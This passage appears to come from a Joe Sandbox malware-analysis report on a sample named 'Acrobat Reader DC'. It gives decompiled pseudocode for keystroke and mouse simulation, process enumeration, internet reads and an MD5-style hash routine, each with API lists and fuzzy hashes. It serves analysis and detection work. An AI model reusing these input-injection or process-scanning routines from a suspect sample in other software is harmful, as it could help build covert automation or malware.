                                  				struct HWND__* _t54;
                                  				intOrPtr _t68;
                                  				char* _t102;
                                  				intOrPtr _t103;
                                  
                                  				_t103 = _a4;
                                  				_t102 = _a8;
                                  				if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0 ||  *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t102 + 3)) != 0 ||  *((char*)(_t102 + 4)) != 0) {
                                  					_t54 =  *(_t103 + 0x20);
                                  					if(_t54 == 0 || GetParent(_t54) == 0) {
                                  						if( *_t102 != 0) {
                                  							E0043471D(_t103, 0xa0,  *(_t103 + 0x27) & 0x000000ff, 2);
                                  						}
                                  						if( *((char*)(_t102 + 1)) != 0) {
                                  							E0043471D(_t103, 0xa1,  *(_t103 + 0x28) & 0x000000ff, 2);
                                  						}
                                  						if( *((char*)(_t102 + 2)) != 0) {
                                  							E0043471D(_t103, 0x11,  *(_t103 + 0x24) & 0x000000ff, 2);
                                  						}
                                  						if( *((char*)(_t102 + 3)) != 0) {
                                  							E0043471D(_t103, 0x12,  *(_t103 + 0x25) & 0x000000ff, 2);
                                  						}
                                  						if( *((char*)(_t102 + 4)) != 0) {
                                  							E0043471D(_t103, 0x5b,  *(_t103 + 0x29) & 0x000000ff, 2);
                                  						}
                                  						L43:
                                  						return E004347A9(_t103);
                                  					}
                                  					if(GetKeyboardState( &_v260) != 0) {
                                  						if( *_t102 != 0) {
                                  							_v244 = _v244 ^ 0x00000080;
                                  							_v100 = _v100 ^ 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 1)) != 0) {
                                  							_v244 = _v244 ^ 0x00000080;
                                  							_v99 = _v99 ^ 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 2)) != 0) {
                                  							_v243 = _v243 ^ 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 3)) != 0) {
                                  							_v242 = _v242 ^ 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 4)) != 0) {
                                  							_v169 = _v169 ^ 0x00000080;
                                  						}
                                  						SetKeyboardState( &_v260);
                                  					}
                                  					if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0) {
                                  						PostMessageW( *(_t103 + 0x20), 0x101, 0x10, ( *(_t103 + 0x26) & 0x000000ff) << 0x00000010 | 0xc0000001);
                                  					}
                                  					if( *((char*)(_t102 + 2)) != 0) {
                                  						PostMessageW( *(_t103 + 0x20), 0x101, 0x11, ( *(_t103 + 0x24) & 0x000000ff) << 0x00000010 | 0xc0000001);
                                  					}
                                  					_t68 =  *((intOrPtr*)(_t102 + 3));
                                  					if(_t68 != 0) {
                                  						if( *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t103 + 0x1c)) != 0) {
                                  							if(_t68 != 0) {
                                  								PostMessageW( *(_t103 + 0x20), 0x101, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0xc0000001);
                                  								goto L30;
                                  							}
                                  						} else {
                                  							PostMessageW( *(_t103 + 0x20), 0x105, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0xe0000001);
                                  							L30:
                                  						}
                                  					}
                                  					if( *((char*)(_t102 + 4)) == 0) {
                                  						goto L43;
                                  					}
                                  					PostMessageW( *(_t103 + 0x20), 0x101, 0x5b, ( *(_t103 + 0x29) & 0x000000ff) << 0x00000010 | 0xc0000001);
                                  					return E004347A9(_t103);
                                  				} else {
                                  					return _t53;
                                  				}
                                  			}















                                  APIs
                                  • GetParent.USER32(?), ref: 0044443B
                                  • GetKeyboardState.USER32(?), ref: 00444450
                                  • SetKeyboardState.USER32(?), ref: 004444A4
                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                  • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                  • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                  • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E00433EE0(void* __eflags, intOrPtr _a4, intOrPtr* _a8, char* _a12) {
                                  				char _v12;
                                  				char _v532;
                                  				intOrPtr _v560;
                                  				void* _v568;
                                  				char _v1084;
                                  				char _v1600;
                                  				char _v2116;
                                  				void* __edi;
                                  				void* _t22;
                                  				void* _t31;
                                  				intOrPtr _t32;
                                  				void* _t34;
                                  				void* _t45;
                                  				char* _t46;
                                  				void* _t47;
                                  				void* _t48;
                                  
                                  				_t46 = _a12;
                                  				_v568 = 0x22c;
                                  				_t45 = CreateToolhelp32Snapshot(2, 0);
                                  				_push( &_v568);
                                  				Process32FirstW(_t45);
                                  				 *_t46 = 0;
                                  				_t22 = E00433D5F(_a4, _a4);
                                  				_t48 = _t47 + 4;
                                  				_t34 = _t22;
                                  				if( *_t46 == 0) {
                                  					while(Process32NextW(_t45,  &_v568) == 1) {
                                  						E00413A0E( &_v532,  &_v12,  &_v2116,  &_v1084,  &_v1600);
                                  						E00411536( &_v1084,  &_v1600);
                                  						_t31 = E004114AB(_t45,  &_v1084, _a4);
                                  						_t48 = _t48 + 0x24;
                                  						if(_t31 != 0) {
                                  							if(_t34 != 0) {
                                  								_t32 = _v560;
                                  								if(_t34 == _t32) {
                                  									 *_a8 = _t32;
                                  									goto L8;
                                  								}
                                  							}
                                  						} else {
                                  							 *_a8 = _v560;
                                  							L8:
                                  							 *_t46 = 1;
                                  						}
                                  						if( *_t46 == 0) {
                                  							continue;
                                  						}
                                  						goto L10;
                                  					}
                                  				}
                                  				L10:
                                  				CloseHandle(_t45);
                                  				return 1;
                                  			}



















                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00433EFD
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00433F0D
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00433F38
                                  • __wsplitpath.LIBCMT ref: 00433F63
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcscat.LIBCMT ref: 00433F76
                                  • __wcsicoll.LIBCMT ref: 00433F86
                                  • CloseHandle.KERNEL32(00000000), ref: 00433FBF
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                  • String ID:
                                  • API String ID: 2547909840-0
                                  • Opcode ID: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                  • Instruction ID: e17d583989bb1df9e9dd6b28cd90faaf4a95b78209a4298828de810110d6b8cb
                                  • Opcode Fuzzy Hash: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                  • Instruction Fuzzy Hash: 9621EAB2800109ABC721DF50DC84FEEB7B8AB48300F5045DEF60997240EB799B84CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0041A208(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                  				intOrPtr _v0;
                                  				void* _v804;
                                  				intOrPtr _v808;
                                  				intOrPtr _v812;
                                  				intOrPtr _t6;
                                  				intOrPtr _t12;
                                  				intOrPtr _t13;
                                  				long _t17;
                                  				intOrPtr _t21;
                                  				intOrPtr _t22;
                                  				intOrPtr _t25;
                                  				intOrPtr _t26;
                                  				intOrPtr _t27;
                                  				intOrPtr* _t31;
                                  				void* _t34;
                                  
                                  				_t27 = __esi;
                                  				_t26 = __edi;
                                  				_t25 = __edx;
                                  				_t22 = __ecx;
                                  				_t21 = __ebx;
                                  				_t6 = __eax;
                                  				_t34 = _t22 -  *0x490d40; // 0x774e8904
                                  				if(_t34 == 0) {
                                  					asm("repe ret");
                                  				}
                                  				 *0x497278 = _t6;
                                  				 *0x497274 = _t22;
                                  				 *0x497270 = _t25;
                                  				 *0x49726c = _t21;
                                  				 *0x497268 = _t27;
                                  				 *0x497264 = _t26;
                                  				 *0x497290 = ss;
                                  				 *0x497284 = cs;
                                  				 *0x497260 = ds;
                                  				 *0x49725c = es;
                                  				 *0x497258 = fs;
                                  				 *0x497254 = gs;
                                  				asm("pushfd");
                                  				_pop( *0x497288);
                                  				 *0x49727c =  *_t31;
                                  				 *0x497280 = _v0;
                                  				 *0x49728c =  &_a4;
                                  				 *0x4971c8 = 0x10001;
                                  				 *0x49717c =  *0x497280;
                                  				 *0x497170 = 0xc0000409;
                                  				 *0x497174 = 1;
                                  				_t12 =  *0x490d40; // 0x774e8904
                                  				_v812 = _t12;
                                  				_t13 =  *0x490d44; // 0x88b176fb
                                  				_v808 = _t13;
                                  				 *0x4971c0 = IsDebuggerPresent();
                                  				_push(1);
                                  				E0041FE19(_t14);
                                  				SetUnhandledExceptionFilter(0);
                                  				_t17 = UnhandledExceptionFilter("pqI");
                                  				if( *0x4971c0 == 0) {
                                  					_push(1);
                                  					E0041FE19(_t17);
                                  				}
                                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                  			}


















                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                  • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                  • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID: pqI
                                  • API String ID: 2579439406-2459173057
                                  • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                  • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                  • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                  • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0043333C(intOrPtr _a4) {
                                  				long _t2;
                                  				long _t3;
                                  				void* _t7;
                                  
                                  				_t8 = _a4;
                                  				_t2 = E004114AB(_t7, _a4, L"UP");
                                  				if(_t2 != 0) {
                                  					_t3 = E004114AB(_t7, _t8, L"DOWN");
                                  					if(_t3 != 0) {
                                  						return 0;
                                  					} else {
                                  						mouse_event(0x800, _t3, _t3, 0xffffff88, _t3);
                                  						return 1;
                                  					}
                                  				} else {
                                  					mouse_event(0x800, _t2, _t2, 0x78, _t2);
                                  					return 1;
                                  				}
                                  			}







                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: __wcsicollmouse_event
                                  • String ID: DOWN
                                  • API String ID: 1033544147-711622031
                                  • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                  • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                  • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                  • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004339B6(WCHAR* _a4) {
                                  				struct _WIN32_FIND_DATAW _v596;
                                  				long _t4;
                                  				void* _t6;
                                  				WCHAR* _t10;
                                  
                                  				_t10 = _a4;
                                  				_t4 = GetFileAttributesW(_t10);
                                  				if(_t4 != 0xffffffff) {
                                  					L4:
                                  					return _t4;
                                  				} else {
                                  					_t6 = FindFirstFileW(_t10,  &_v596);
                                  					if(_t6 != 0xffffffff) {
                                  						FindClose(_t6);
                                  						_t4 = _v596.dwFileAttributes;
                                  						goto L4;
                                  					} else {
                                  						return _t6;
                                  					}
                                  				}
                                  			}








                                  APIs
                                  • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                  • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                  • FindClose.KERNEL32(00000000), ref: 004339EB
                                  Similarity
                                  • API ID: FileFind$AttributesCloseFirst
                                  • String ID:
                                  • API String ID: 48322524-0
                                  • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                  • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                  • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                  • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E004422FE(long _a4, long _a8) {
                                  				void* _t24;
                                  				long _t32;
                                  				void* _t33;
                                  				void* _t39;
                                  				long _t40;
                                  				void* _t41;
                                  
                                  				_t33 = _a8;
                                  				_t40 = _a4;
                                  				_a4 = 1;
                                  				_a8 = 1;
                                  				InternetQueryDataAvailable(_t33,  &_a8, 0, 0);
                                  				if(_a8 == 0) {
                                  					_a8 = 0x400;
                                  				}
                                  				if(_a4 == 0) {
                                  					L9:
                                  					_t37 =  *(_t40 + 8) |  *(_t40 + 0xc);
                                  					if(( *(_t40 + 8) |  *(_t40 + 0xc)) != 0) {
                                  						return E004422CB(_t40, 0, 0, 1);
                                  					} else {
                                  						return E004422CB(_t40, 0x21, 0xdeadbeef, _t37);
                                  					}
                                  				} else {
                                  					while(1) {
                                  						_t24 = E00431995(_a8);
                                  						_t41 = _t41 + 4;
                                  						_t39 = _t24;
                                  						if(InternetReadFile(_t33, _t39, _a8,  &_a4) == 0) {
                                  							break;
                                  						}
                                  						_t29 = _a4;
                                  						if(_a4 == 0) {
                                  							_push(_t39);
                                  							E004111DC();
                                  							goto L9;
                                  						} else {
                                  							E00431930(_t40 + 0x44, _t39, _t29);
                                  							_t32 = _a4;
                                  							 *(_t40 + 8) =  *(_t40 + 8) + _t32;
                                  							asm("adc dword [esi+0xc], 0x0");
                                  							if(_t32 != 0) {
                                  								continue;
                                  							} else {
                                  								goto L9;
                                  							}
                                  						}
                                  						goto L13;
                                  					}
                                  					_push(_t39);
                                  					E004111DC();
                                  					return E004422CB(_t40, 0x20, 0xdeadbeef, 0);
                                  				}
                                  				L13:
                                  			}










                                  APIs
                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                  Similarity
                                  • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                  • String ID:
                                  • API String ID: 901099227-0
                                  • Opcode ID: 61fb9ab2a3299f8cead921e80471455f6f6b20a2502781ff411aee126c92a39c
                                  • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                  • Opcode Fuzzy Hash: 61fb9ab2a3299f8cead921e80471455f6f6b20a2502781ff411aee126c92a39c
                                  • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,00000001,?,00451C81,?,00000001,?), ref: 0044AF9D
                                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,00000001,?,00451C81,?,00000001,?), ref: 0044AFB6
                                  Similarity
                                  • API ID: ErrorFormatLastMessage
                                  • String ID:
                                  • API String ID: 3479602957-0
                                  • Opcode ID: 7201a099929c13ddf9d8c4ed88e1fa575203edf34e49f70b38f45227ddf022c1
                                  • Instruction ID: 34579116b05a7082732a3a1f7365c6d8fd3edd81a632b3ed1e6c87f0e426309d
                                  • Opcode Fuzzy Hash: 7201a099929c13ddf9d8c4ed88e1fa575203edf34e49f70b38f45227ddf022c1
                                  • Instruction Fuzzy Hash: 57F0B4712503186AFB24AB58DC49FBAB36CEF44711F0046AAF504971D1D6F07D40C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 49%
                                  			E0040FA10(intOrPtr _a4, signed int _a8) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				intOrPtr _v44;
                                  				intOrPtr _v48;
                                  				intOrPtr _v52;
                                  				intOrPtr _v56;
                                  				intOrPtr _v60;
                                  				intOrPtr _v64;
                                  				intOrPtr _v68;
                                  				char _v72;
                                  				signed int _t248;
                                  				signed int _t250;
                                  				signed int _t252;
                                  				signed int _t254;
                                  				signed int _t256;
                                  				signed int _t264;
                                  				signed int _t281;
                                  				signed int _t298;
                                  				signed int _t308;
                                  				signed int _t310;
                                  				signed int _t312;
                                  				signed int _t314;
                                  				signed int _t316;
                                  				signed int _t318;
                                  				signed int _t320;
                                  				signed int _t322;
                                  				signed int _t335;
                                  				signed int _t376;
                                  				signed int _t385;
                                  				signed int _t387;
                                  				signed int _t389;
                                  				signed int _t391;
                                  				signed int _t393;
                                  				signed int _t395;
                                  				signed int _t397;
                                  				signed int _t399;
                                  				signed int _t401;
                                  				signed int _t403;
                                  				signed int _t412;
                                  				signed int _t414;
                                  				signed int _t416;
                                  				signed int _t418;
                                  				signed int _t420;
                                  				intOrPtr _t436;
                                  				signed int _t454;
                                  				signed int _t456;
                                  				signed int _t458;
                                  				signed int _t460;
                                  				signed int _t462;
                                  				signed int _t464;
                                  				signed int _t466;
                                  				signed int _t468;
                                  				signed int _t470;
                                  				signed int _t472;
                                  				signed int _t474;
                                  				signed int _t482;
                                  				signed int _t484;
                                  				signed int _t486;
                                  				signed int _t488;
                                  				signed int _t490;
                                  				intOrPtr _t491;
                                  				signed int _t544;
                                  				signed int _t610;
                                  				signed int _t621;
                                  				signed int _t627;
                                  				signed int _t693;
                                  				signed int _t694;
                                  				signed int _t696;
                                  				signed int _t701;
                                  				signed int _t703;
                                  				signed int _t708;
                                  				signed int _t710;
                                  				signed int _t715;
                                  				signed int _t719;
                                  				signed int _t724;
                                  				signed int _t726;
                                  				signed int _t728;
                                  				signed int _t730;
                                  				signed int _t732;
                                  				signed int _t734;
                                  				signed int _t740;
                                  				signed int _t746;
                                  				signed int _t748;
                                  				signed int _t750;
                                  				signed int _t752;
                                  				signed int _t754;
                                  
                                  				_t491 = _a4;
                                  				_t694 =  *(_t491 + 0x38);
                                  				_t335 =  *(_t491 + 0x3c);
                                  				_v8 =  *((intOrPtr*)(_t491 + 0x40));
                                  				E004100C0(_a8,  &_v72);
                                  				_t385 = _v8;
                                  				asm("rol eax, 0x7");
                                  				_t248 = ( !_t694 & _t385 | _t335 & _t694) +  *((intOrPtr*)(_t491 + 0x34)) + _v72 - 0x28955b88 + _t694;
                                  				asm("rol ecx, 0xc");
                                  				_t387 = ( !_t248 & _t335 | _t694 & _t248) + _v68 + _t385 - 0x173848aa + _t248;
                                  				asm("ror edx, 0xf");
                                  				_t454 = ( !_t387 & _t694 | _t387 & _t248) + _v64 + _t335 + 0x242070db + _t387;
                                  				asm("ror esi, 0xa");
                                  				_t696 = ( !_t454 & _t248 | _t387 & _t454) + _v60 + _t694 - 0x3e423112 + _t454;
                                  				_a8 = _t696;
                                  				_t701 = _a8;
                                  				asm("rol eax, 0x7");
                                  				_t250 = ( !_t696 & _t387 | _t454 & _a8) + _v56 + _t248 - 0xa83f051 + _t701;
                                  				asm("rol ecx, 0xc");
                                  				_t389 = ( !_t250 & _t454 | _t701 & _t250) + _v52 + _t387 + 0x4787c62a + _t250;
                                  				asm("ror edx, 0xf");
                                  				_t456 = ( !_t389 & _t701 | _t389 & _t250) + _v48 + _t454 - 0x57cfb9ed + _t389;
                                  				asm("ror esi, 0xa");
                                  				_t703 = ( !_t456 & _t250 | _t389 & _t456) + _v44 + _t701 - 0x2b96aff + _t456;
                                  				_a8 = _t703;
                                  				_t708 = _a8;
                                  				asm("rol eax, 0x7");
                                  				_t252 = ( !_t703 & _t389 | _t456 & _a8) + _v40 + _t250 + 0x698098d8 + _t708;
                                  				asm("rol ecx, 0xc");
                                  				_t391 = ( !_t252 & _t456 | _t708 & _t252) + _v36 + _t389 - 0x74bb0851 + _t252;
                                  				asm("ror edx, 0xf");
                                  				_t458 = ( !_t391 & _t708 | _t391 & _t252) + _v32 + _t456 - 0xa44f + _t391;
                                  				asm("ror esi, 0xa");
                                  				_t710 = ( !_t458 & _t252 | _t391 & _t458) + _v28 + _t708 - 0x76a32842 + _t458;
                                  				_a8 = _t710;
                                  				_t715 = _a8;
                                  				asm("rol eax, 0x7");
                                  				_t254 = ( !_t710 & _t391 | _t458 & _a8) + _v24 + _t252 + 0x6b901122 + _t715;
                                  				asm("rol ecx, 0xc");
                                  				_t393 = ( !_t254 & _t458 | _t715 & _t254) + _v20 + _t391 - 0x2678e6d + _t254;
                                  				_t544 =  !_t393;
                                  				_t63 = _t458 - 0x5986bc72; // -1497744253
                                  				asm("ror edx, 0xf");
                                  				_t460 = (_t544 & _t715 | _t393 & _t254) + _v16 + _t63 + _t393;
                                  				_t719 =  !_t460;
                                  				_v8 = _t719;
                                  				asm("ror esi, 0xa");
                                  				_t724 = (_t719 & _t254 | _t393 & _t460) + _v12 + _a8 + 0x49b40821 + _t460;
                                  				asm("rol eax, 0x5");
                                  				_t256 = (_t544 & _t460 | _t393 & _t724) + _v68 + _t254 - 0x9e1da9e + _t724;
                                  				asm("rol ecx, 0x9");
                                  				_t395 = (_v8 & _t724 | _t460 & _t256) + _v48 + _t393 - 0x3fbf4cc0 + _t256;
                                  				asm("rol edx, 0xe");
                                  				_t462 = ( !_t724 & _t256 | _t395 & _t724) + _v28 + _t460 + 0x265e5a51 + _t395;
                                  				asm("ror esi, 0xc");
                                  				_t726 = ( !_t256 & _t395 | _t462 & _t256) + _v72 + _t724 - 0x16493856 + _t462;
                                  				asm("rol eax, 0x5");
                                  				_a8 = ( !_t395 & _t462 | _t395 & _t726) + _v52 + _t256 - 0x29d0efa3 + _t726;
                                  				_t264 = _a8;
                                  				asm("rol ecx, 0x9");
                                  				_t397 = ( !_t462 & _t726 | _t462 & _a8) + _v32 + _t395 + 0x2441453 + _t264;
                                  				asm("rol edx, 0xe");
                                  				_t464 = ( !_t726 & _t264 | _t397 & _t726) + _v12 + _t462 - 0x275e197f + _t397;
                                  				asm("ror esi, 0xc");
                                  				_t728 = ( !_t264 & _t397 | _t464 & _a8) + _v56 + _t726 - 0x182c0438 + _t464;
                                  				asm("rol eax, 0x5");
                                  				_a8 = ( !_t397 & _t464 | _t397 & _t728) + _v36 + _a8 + 0x21e1cde6 + _t728;
                                  				_t106 = _t397 - 0x3cc8f82a; // -1015545653
                                  				_t281 = _a8;
                                  				asm("rol ecx, 0x9");
                                  				_t399 = ( !_t464 & _t728 | _t464 & _a8) + _v16 + _t106 + _t281;
                                  				asm("rol edx, 0xe");
                                  				_t466 = ( !_t728 & _t281 | _t399 & _t728) + _v60 + _t464 - 0xb2af279 + _t399;
                                  				asm("ror esi, 0xc");
                                  				_t730 = ( !_t281 & _t399 | _t466 & _a8) + _v40 + _t728 + 0x455a14ed + _t466;
                                  				asm("rol eax, 0x5");
                                  				_a8 = ( !_t399 & _t466 | _t399 & _t730) + _v20 + _a8 - 0x561c16fb + _t730;
                                  				_t298 = _a8;
                                  				asm("rol ecx, 0x9");
                                  				_t401 = ( !_t466 & _t730 | _t466 & _a8) + _v64 + _t399 - 0x3105c08 + _t298;
                                  				asm("rol edx, 0xe");
                                  				_t468 = ( !_t730 & _t298 | _t401 & _t730) + _v44 + _t466 + 0x676f02d9 + _t401;
                                  				asm("ror esi, 0xc");
                                  				_t732 = ( !_t298 & _t401 | _t468 & _a8) + _v24 + _t730 - 0x72d5b376 + _t468;
                                  				asm("rol eax, 0x4");
                                  				_t308 = (_t401 ^ _t468 ^ _t732) + _v52 + _a8 - 0x5c6be + _t732;
                                  				asm("rol ecx, 0xb");
                                  				_t403 = (_t468 ^ _t732 ^ _t308) + _v40 + _t401 - 0x788e097f + _t308;
                                  				asm("rol edx, 0x10");
                                  				_t470 = (_t403 ^ _t732 ^ _t308) + _v28 + _t468 + 0x6d9d6122 + _t403;
                                  				_t610 = _t403 ^ _t470;
                                  				_a8 = _t610;
                                  				_t145 = _t732 - 0x21ac7f4; // -31051519
                                  				asm("ror esi, 0x9");
                                  				_t734 = (_t610 ^ _t308) + _v16 + _t145 + _t470;
                                  				asm("rol eax, 0x4");
                                  				_t310 = (_a8 ^ _t734) + _v68 + _t308 - 0x5b4115bc + _t734;
                                  				asm("rol edi, 0xb");
                                  				_t621 = (_t470 ^ _t734 ^ _t310) + _v56 + _t403 + 0x4bdecfa9 + _t310;
                                  				asm("rol edx, 0x10");
                                  				_t472 = (_t621 ^ _t734 ^ _t310) + _v44 + _t470 - 0x944b4a0 + _t621;
                                  				_t376 = _t621 ^ _t472;
                                  				asm("ror ecx, 0x9");
                                  				_t412 = (_t376 ^ _t310) + _v32 + _t734 - 0x41404390 + _t472;
                                  				asm("rol eax, 0x4");
                                  				_t312 = (_t376 ^ _t412) + _v20 + _t310 + 0x289b7ec6 + _t412;
                                  				asm("rol esi, 0xb");
                                  				_t740 = (_t472 ^ _t412 ^ _t312) + _v72 + _t621 - 0x155ed806 + _t312;
                                  				asm("rol edi, 0x10");
                                  				_t627 = (_t740 ^ _t412 ^ _t312) + _v60 + _t472 - 0x2b10cf7b + _t740;
                                  				_t474 = _t740 ^ _t627;
                                  				asm("ror ecx, 0x9");
                                  				_t414 = (_t474 ^ _t312) + _v48 + _t412 + 0x4881d05 + _t627;
                                  				asm("rol eax, 0x4");
                                  				_t314 = (_t474 ^ _t414) + _v36 + _t312 - 0x262b2fc7 + _t414;
                                  				asm("rol edx, 0xb");
                                  				_t482 = (_t627 ^ _t414 ^ _t314) + _v24 + _t740 - 0x1924661b + _t314;
